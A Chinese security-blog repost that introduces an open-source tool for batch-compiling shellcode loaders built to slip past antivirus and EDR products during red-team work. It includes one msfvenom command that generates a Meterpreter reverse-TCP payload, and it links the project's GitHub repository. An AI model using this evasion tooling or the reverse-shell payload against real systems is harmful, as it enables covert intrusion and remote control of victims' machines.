绕过AV/EDR的代码例子

admin 2023年6月10日16:01:41评论4 views字数 714阅读2分22秒阅读模式

0x01 工具介绍

许多内网场景或处于红队评估的渗透测试工作中经常会遇到各种AV/EDR,此前我已经在工作中编写了大量的Shellcode loader用于绕过防病毒,由于每次使用时需要编译二进制文件,频繁地打开臃肿的IDE已经让我疲惫不堪,因此我想编写一个自动化工具来快速并且批量地编译二进制文件,旨在提升工作效率。

绕过AV/EDR的代码例子

0x02 安装与使用

shellcode loader的使用

绕过AV/EDR的代码例子

该模块一共携带13种shellcode加载方式,由于AV/EDR是实时更新的,开源工具显然不能有效地绕过高级AV/EDR,或许某些加载模块仍然可以绕过Microsoft Defender,但是大部分ShellcodeLoader已经被高级AV/EDR抓住(例如Kaspersky、Norton、Bitdefender、ESET Nod32......),这也是我选择将它们开源的原因,以CobaltStrike/Metasploit的攻击载荷为例,您需要生成stager/stageless的bin文件,CobaltStrike:

绕过AV/EDR的代码例子

Metasploit:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.0 LPORT=4488 -f raw -o payload.bin 公众号:web安全工具库

绕过AV/EDR的代码例子

依次选择注入模式、payload、要注入的进程即可在桌面生成二进制文件。

其它语言的loader也是大同小异,只要有编程环境就可以编译成功。

0x03 项目链接下载

 

https://github.com/INotGreen/GlllPowerloader

原文始发于微信公众号(网络安全者):绕过AV/EDR的代码例子

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月10日16:01:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   绕过AV/EDR的代码例子https://cn-sec.com/archives/1796299.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息